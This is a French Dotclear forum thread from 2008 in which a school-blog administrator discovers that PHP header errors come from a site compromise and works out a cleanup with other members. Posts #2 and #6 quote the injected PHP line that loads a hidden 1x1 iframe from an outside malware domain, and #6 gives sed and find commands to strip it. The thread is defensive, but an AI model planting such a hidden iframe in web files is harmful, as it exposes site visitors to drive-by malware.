Dotclear

Vous n'êtes pas identifié(e).

Annonce

13 février 2024 Sortie de Dotclear 2.29

#1 2008-04-12 13:35:11

zarer
Membre
Inscription : 2005-04-30

Problème "Cannot send session cache limiter..."

Bonjour à tous,

J'ai un souci de "cache" manifestement sur un blog que j'administre depuis plusieurs années. J'avais déjà eu un problème semblable et j'avais dû vider le "cache" dans un fichier dont malheureusement j'ai oublié le nom et la localisation.

Il s'agissait d'un fichier lié à l'historique des recherches, etc. Quelqu'un a-t-il une idée ?

J'ai recherché sur le forum les problèmes similaires mais ils concernent (presque) tous des problèmes d'installation.

Je signale que le site a migré il y a quelque temps sur un autre serveur et que je ne connais absolument rien de cette procédure. Mais le problème n'est pas apparu tout de suite après la migration. Il ne semble donc pas lié directement à ce transfert.

Voici l'adresse :

http://www.clg-montaigne-goussainville. … /index.php

Et voici l'erreur :

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /share/www.clg-montaigne-goussainville.ac-versailles.fr/inc/classes/class.ini.file.php:138) in /share/www.clg-montaigne-goussainville.ac-versailles.fr/ecrire/inc/prepend.php on line 33

Warning: Cannot modify header information - headers already sent by (output started at /share/www.clg-montaigne-goussainville.ac-versailles.fr/inc/classes/class.ini.file.php:138) in /share/www.clg-montaigne-goussainville.ac-versailles.fr/layout/lib.cache.php on line 71

Warning: Cannot modify header information - headers already sent by (output started at /share/www.clg-montaigne-goussainville.ac-versailles.fr/inc/classes/class.ini.file.php:138) in /share/www.clg-montaigne-goussainville.ac-versailles.fr/layout/lib.cache.php on line 73

Warning: Cannot modify header information - headers already sent by (output started at /share/www.clg-montaigne-goussainville.ac-versailles.fr/inc/classes/class.ini.file.php:138) in /share/www.clg-montaigne-goussainville.ac-versailles.fr/layout/lib.cache.php on line 73

Warning: Cannot modify header information - headers already sent by (output started at /share/www.clg-montaigne-goussainville.ac-versailles.fr/inc/classes/class.ini.file.php:138) in /share/www.clg-montaigne-goussainville.ac-versailles.fr/layout/lib.cache.php on line 73

Warning: Cannot modify header information - headers already sent by (output started at /share/www.clg-montaigne-goussainville.ac-versailles.fr/inc/classes/class.ini.file.php:138) in /share/www.clg-montaigne-goussainville.ac-versailles.fr/ecrire/tools/shoutbox/functions.php on line 241

Warning: Cannot modify header information - headers already sent by (output started at /share/www.clg-montaigne-goussainville.ac-versailles.fr/inc/classes/class.ini.file.php:138) in /share/www.clg-montaigne-goussainville.ac-versailles.fr/index.php on line 46

Hors ligne

#2 2008-04-12 22:33:22

zarer
Membre
Inscription : 2005-04-30

Re : Problème "Cannot send session cache limiter..."

Attention ! Ce message d'erreur est le résultat d'une attaque, je ne sais trop de quelle nature et où cette attaque a eu lieu, mais elle se caractérise par l'ajout d'un ligne en php dans la presque totalité des fichiers qui se traduit par l'url suivante :

<?php echo '<iframe src="http://cdpuvbhfzz.com/dl/adv598.php" width=1 height=1></iframe>'; ?>

Je ne sais pas non plus quelles sont les plate-formes concernées mais Joomla semble être aussi concerné tout comme WordPress.


zarer a écrit :

Et voici l'erreur :

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /share/www.clg-montaigne-goussainville.ac-versailles.fr/inc/classes/class.ini.file.php:138) in /share/www.clg-montaigne-goussainville.ac-versailles.fr/ecrire/inc/prepend.php on line 33

Warning: Cannot modify header information - headers already sent by (output started at /share/www.clg-montaigne-goussainville.ac-versailles.fr/inc/classes/class.ini.file.php:138) in /share/www.clg-montaigne-goussainville.ac-versailles.fr/layout/lib.cache.php on line 71

Warning: Cannot modify header information - headers already sent by (output started at /share/www.clg-montaigne-goussainville.ac-versailles.fr/inc/classes/class.ini.file.php:138) in /share/www.clg-montaigne-goussainville.ac-versailles.fr/layout/lib.cache.php on line 73

Warning: Cannot modify header information - headers already sent by (output started at /share/www.clg-montaigne-goussainville.ac-versailles.fr/inc/classes/class.ini.file.php:138) in /share/www.clg-montaigne-goussainville.ac-versailles.fr/layout/lib.cache.php on line 73

Warning: Cannot modify header information - headers already sent by (output started at /share/www.clg-montaigne-goussainville.ac-versailles.fr/inc/classes/class.ini.file.php:138) in /share/www.clg-montaigne-goussainville.ac-versailles.fr/layout/lib.cache.php on line 73

Warning: Cannot modify header information - headers already sent by (output started at /share/www.clg-montaigne-goussainville.ac-versailles.fr/inc/classes/class.ini.file.php:138) in /share/www.clg-montaigne-goussainville.ac-versailles.fr/ecrire/tools/shoutbox/functions.php on line 241

Warning: Cannot modify header information - headers already sent by (output started at /share/www.clg-montaigne-goussainville.ac-versailles.fr/inc/classes/class.ini.file.php:138) in /share/www.clg-montaigne-goussainville.ac-versailles.fr/index.php on line 46

Hors ligne

#3 2008-04-13 14:00:57

Lomalarch
Responsable du photocopieur
Lieu : Colombes (92)
Inscription : 2006-05-02
Site Web

Re : Problème "Cannot send session cache limiter..."

Bonjour et beinvenue,

tu as envisagé de faire une mise à jour vers la 1.2.7.1 qui, précisément, est la plus sécurisée à ce jour ?


RTFM attitude : https://fr.dotclear.org/documentation/2.0
Le chantier tips, tutos et astuces : http://tips.dotaddict.org/
Rien nulle part??? une petite recherche sul’ forum, alors?: https://forum.dotclear.org/search.php ?

Hors ligne

#4 2008-04-13 18:24:00

zarer
Membre
Inscription : 2005-04-30

Re : Problème "Cannot send session cache limiter..."

Bonsoir,

Pour te répondre franchement... non. Je n'ai pas vraiment envie d'avoir à tous reprendre, les liens et tout le reste. Là dans l'immédiat, je suis en train de me taper le retrait de cette satanée ligne dans tous les fichiers en php ! J'enrage !

Si le passage m'évite de nettoyer un à un tous les fichiers, pourquoi pas !

@+

Lomalarch a écrit :

Bonjour et beinvenue,

tu as envisagé de faire une mise à jour vers la 1.2.7.1 qui, précisément, est la plus sécurisée à ce jour ?

Hors ligne

#5 2008-04-13 19:28:12

brol
Membre
Inscription : 2005-10-16

Re : Problème "Cannot send session cache limiter..."

une mise à jour ne demande pas de changer tous les liens ou tout le reste (à noter que c'est quoi ce reste ?).

Hors ligne

#6 2008-04-14 17:54:03

zarer
Membre
Inscription : 2005-04-30

Re : Problème "Cannot send session cache limiter..."

Bonsoir, si la mise à jour ne demande ne demande aucune adaptation du contenu... je veux bien la tenter. Parce que là, le blog tourne depuis pas mal de temps, il y a pas de billets, etc.

brol a écrit :

une mise à jour ne demande pas de changer tous les liens ou tout le reste (à noter que c'est quoi ce reste ?).

Pour info, tous les fichiers .php et pas mal de fichiers .html sont touchés par cette injection de code ! Avec les utilisateurs des Listes Debian et Linonroot-dev nous avons mis au point une procédure qui permet de nettoyer les fichiers assez efficace :

1) On crée un fichier vierge "purge_code.sed" contenant ce petit script :

${ # sur la dernière ligne,
        \%<?php echo '<iframe src="http://cdpuvbhfzz.com/dl/adv598.php" width=1 height=1></iframe>'; ?>%{ # quand elle est infectée,
                s///g # on supprime le(s) code(s)
        }
}

Malheureusement, la ligne se traduit en url quand on l'insère dans le forum... Si vous voulez la ligne exact, récupérez le fichier texte.

2) Récupérer les fichiers injectés (tous les fichiers... c'est plus sûr). On lance la recherche, la sauvegarde (ficheirs ".infect") et la purge :

find /répertoire/poisseux/à/traiter/ -type f -iname \*.php -exec sed -i.infect -f /localisation/du/script/purge_code.sed {} +

On peut répéter la même chose sur les fichiers .html :

find /répertoire/poisseux/à/traiter/ -type f -iname \*.html -exec sed -i.infect -f /localisation/du/script/purge_code.sed {} +

3) On vérifie que tout est propre et on efface les fichiers sauvegardés ".infect" :

find /répertoire/contenant/tous/les/fichiers/ -iname "*.infect" | xargs rm -f

Hors ligne

#7 2008-04-14 17:56:27

zarer
Membre
Inscription : 2005-04-30

Re : Problème "Cannot send session cache limiter..."

Désolé pour les fautes. Il fallait lire :

Bonsoir, si la mise à jour ne demande aucune adaptation du contenu... je veux bien la tenter. Parce que là, le blog tourne depuis pas mal de temps, il y a pas mal de billets, etc.

@+

Hors ligne

#8 2008-04-14 18:00:09

Dsls
Modérateur couteau-suisse
Inscription : 2004-11-18
Site Web

Re : Problème "Cannot send session cache limiter..."

Ce n'est pas en enlevant la ligne de code de chaque fichier que tu colmateras la faille pour autant. Les gens qui ont ajouté ces lignes pourront les ajouter à souhait, si tu ne patches pas ton blog (et si pour autant la faille exploitée est une faille dotclear, ce qui n'est pas forcément le cas)

D'ailleurs, tu n'as qu'un dotclear sur ton site, rien d'autre ? Et quels plugins installés ?


Dyslexics have more fnu!

Hors ligne

#9 2008-04-14 20:30:04

zarer
Membre
Inscription : 2005-04-30

Re : Problème "Cannot send session cache limiter..."

Heu... loin de moi l'idée de colmater la faille en nettoyant les fichiers... Il s'agit juste de faire le ménage dans un premier temps en récupérant mes billes, vois-tu ?

Quant à la faille, elle est maintenant localisée... Et DotClear ne semble pas en cause.

Dsls a écrit :

Ce n'est pas en enlevant la ligne de code de chaque fichier que tu colmateras la faille pour autant. Les gens qui ont ajouté ces lignes pourront les ajouter à souhait, si tu ne patches pas ton blog (et si pour autant la faille exploitée est une faille dotclear, ce qui n'est pas forcément le cas)

D'ailleurs, tu n'as qu'un dotclear sur ton site, rien d'autre ? Et quels plugins installés ?

Non je n'ai pas qu'un DotClear sur cet espace... mais mon premier réflexe a été de chercher ça et là si d'autres avaient eu le même souci. Est-ce illégitime ?

Hors ligne

#10 2008-04-14 21:34:58

Lomalarch
Responsable du photocopieur
Lieu : Colombes (92)
Inscription : 2006-05-02
Site Web

Re : Problème "Cannot send session cache limiter..."

Illégitime bien sûr que non.

En revanche, répondre « je n’envisage pas de mieux sécuriser mon blog en le mettant à jour alors que mon site vient de subir une attaque », comprends que l’on puisse en être surpris ;-)


RTFM attitude : https://fr.dotclear.org/documentation/2.0
Le chantier tips, tutos et astuces : http://tips.dotaddict.org/
Rien nulle part??? une petite recherche sul’ forum, alors?: https://forum.dotclear.org/search.php ?

Hors ligne

#11 2008-04-15 08:10:26

zarer
Membre
Inscription : 2005-04-30

Re : Problème "Cannot send session cache limiter..."

Bonjour,

Mouais... le raccourci (pour la moquerie) est un peu grossier. Il faudrait dire : si mettre à jour DotClear doit m'obliger à des adaptations lourdes, doi-je encore le redire ? Alors je le refais : si la mise à jour de DotClear est trop lourde, je ne la ferai pas. Je migrerai vers une autre plate-forme qui gère mieux l'upgrade.

Ça va mieux comme ça ?

@+


Lomalarch a écrit :

Illégitime bien sûr que non.

En revanche, répondre « je n’envisage pas de mieux sécuriser mon blog en le mettant à jour alors que mon site vient de subir une attaque », comprends que l’on puisse en être surpris ;-)

Hors ligne

#12 2008-04-15 09:19:35

Lomalarch
Responsable du photocopieur
Lieu : Colombes (92)
Inscription : 2006-05-02
Site Web

Re : Problème "Cannot send session cache limiter..."

Tout au plus étais-je taquin. La mise à jour de Dotclear est documentée sur ce site, le passage à la 1.2.7 et supérieure détaillé sur ce billet du blog, et ne demande pas de revenir sur les personnalisations qu’on a faites sur son thème (par exemple).

Évidemment, si tu as modifié la moitié des fichiers du cœur de l’appli pour personnaliser le fonctionnement de celle-ci c’est plus compliqué. In fine tu es seul juge de la complexité, mais il t’incombe de te renseigner sur l’étendue de celle-ci – à mon avis la première chose à faire avant de balayer l’idée d’un revers de main.

Note que je ne parle pas d’un passage à la v2 de Dotclear qui, là, est une vraie migration ;-)


RTFM attitude : https://fr.dotclear.org/documentation/2.0
Le chantier tips, tutos et astuces : http://tips.dotaddict.org/
Rien nulle part??? une petite recherche sul’ forum, alors?: https://forum.dotclear.org/search.php ?

Hors ligne

#13 2008-04-15 11:42:07

zarer
Membre
Inscription : 2005-04-30

Re : Problème "Cannot send session cache limiter..."

Merci pour les infos. La taquinerie est oubliée. Je vais évaluer la situation. Parce qu'en effet, il y a eu pas mal de personnalisation.

@+


Lomalarch a écrit :

Tout au plus étais-je taquin. La mise à jour de Dotclear est documentée sur ce site, le passage à la 1.2.7 et supérieure détaillé sur ce billet du blog, et ne demande pas de revenir sur les personnalisations qu’on a faites sur son thème (par exemple).

Évidemment, si tu as modifié la moitié des fichiers du cœur de l’appli pour personnaliser le fonctionnement de celle-ci c’est plus compliqué. In fine tu es seul juge de la complexité, mais il t’incombe de te renseigner sur l’étendue de celle-ci – à mon avis la première chose à faire avant de balayer l’idée d’un revers de main.

Note que je ne parle pas d’un passage à la v2 de Dotclear qui, là, est une vraie migration ;-)

Hors ligne

Vous n'êtes pas identifié(e).

Pied de page des forums

Sites map